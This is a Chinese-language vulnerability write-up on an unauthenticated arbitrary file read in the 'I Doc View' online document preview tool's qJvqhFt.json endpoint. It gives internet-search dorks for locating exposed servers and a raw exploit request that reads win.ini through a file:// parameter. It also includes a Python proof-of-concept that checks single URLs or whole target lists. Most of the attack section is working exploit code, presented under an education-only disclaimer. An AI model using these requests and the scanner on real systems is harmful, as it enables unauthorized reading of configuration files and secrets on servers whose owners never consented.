声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。
文章目录
- 漏洞描述
- 漏洞复现
- 测试工具
漏洞描述
I doc view 在线文档预览是一个用于查看、编辑、管理文档的工具。其qJvqhFt.json接口存在任意文件读取,未授权攻击者可以利用其读取网站配置文件等敏感信息。
漏洞复现
1)信息收集
fofa:title="在线文档预览 - I Doc View"
hunter:web.title="在线文档预览 - I Doc View"
世界如此美丽,值得去探索。
2)构造数据包
GET /view/qJvqhFt.json?start=1&size=5&url=file%3A%2F%2F%2FC%3A%2Fwindows%2Fwin.ini&idocv_auth=sapi HTTP/1.1
Host: ip
代码解释:
- start=1:这通常表示请求的分页参数,start=1可能意味着请求从第一项数据开始。size=5:这同样是一个分页参数,表示请求返回的数据量限制为最多5项。
- file%3A%2F%2F%2FC%3A%2Fwindows%2Fwin.ini:解码后为
file://C:/windows/win.ini,这个参数包含了一个文件的URL,格式为file://,后面跟着的是Windows系统中的文件路径。这里,它指向了Windows操作系统的win.ini配置文件。 - idocv_auth=sapi:这可能是一个认证参数,用于验证请求的合法性。sapi可能是某种认证令牌或密钥。
测试工具
poc
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 导入requests库,用于发送HTTP请求
import requests
# 导入argparse库,用于解析命令行参数
import argparse
# 导入time库,虽然在这段代码中未使用,但可能用于其他目的,比如等待或延迟
import time
# 从urllib3库导入InsecureRequestWarning,用于忽略SSL警告
from urllib3.exceptions import InsecureRequestWarning
# 定义打印颜色常量
RED = '\033[91m' # 红色
RESET = '\033[0m' # 重置颜色
# 忽略不安全请求的警告,避免在请求HTTPS时提示不安全警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# 定义检查漏洞的函数
def check_vulnerability(url):
try:
# 去除URL末尾的斜杠,并构造完整的攻击URL
attack_url = url.rstrip('/') + "/view/qJvqhFt.json?start=1&size=5&url=file%3A%2F%2F%2FC%3A%2Fwindows%2Fwin.ini&idocv_auth=sapi"
# 发送GET请求到攻击URL,不验证SSL证书,超时时间设置为10秒
response = requests.get(attack_url, verify=False, timeout=10)
# 检查HTTP响应状态码和响应体中的关键字,判断是否存在漏洞
if response.status_code == 200 and 'fonts' in response.text:
print(f"{RED}URL [{url}] 可能存在I Doc View 在线文档预览 qJvqhFt.json 任意文件读取漏洞{RESET}")
else:
print(f"URL [{url}] 不存在漏洞")
# 捕获请求超时异常,提示可能存在漏洞
except requests.exceptions.Timeout:
print(f"URL [{url}] 请求超时,可能存在漏洞")
# 捕获其他请求异常,打印错误信息
except requests.RequestException as e:
print(f"URL [{url}] 请求失败: {e}")
# 定义主函数,用于解析命令行参数并调用检查函数
def main():
# 创建ArgumentParser对象,用于解析命令行参数
parser = argparse.ArgumentParser(description='检测目标地址是否存在I Doc View 在线文档预览 qJvqhFt.json 任意文件读取漏洞')
# 添加命令行参数,用于指定目标URL
parser.add_argument('-u', '--url', help='指定目标地址')
# 添加命令行参数,用于指定包含目标地址的文本文件
parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')
# 解析命令行参数
args = parser.parse_args()
# 如果指定了单个URL,则检查该URL是否存在漏洞
if args.url:
# 如果URL未以http://或https://开头,则添加http://前缀
if not args.url.startswith("http://") and not args.url.startswith("https://"):
args.url = "http://" + args.url
check_vulnerability(args.url)
# 如果指定了文件,则逐行读取文件中的URL并检查
elif args.file:
with open(args.file, 'r') as file:
urls = file.read().splitlines()
for url in urls:
# 如果URL未以http://或https://开头,则添加http://前缀
if not url.startswith("http://") and not url.startswith("https://"):
url = "http://" + url
check_vulnerability(url)
# 程序入口点
if __name__ == '__main__':
main()
运行截图
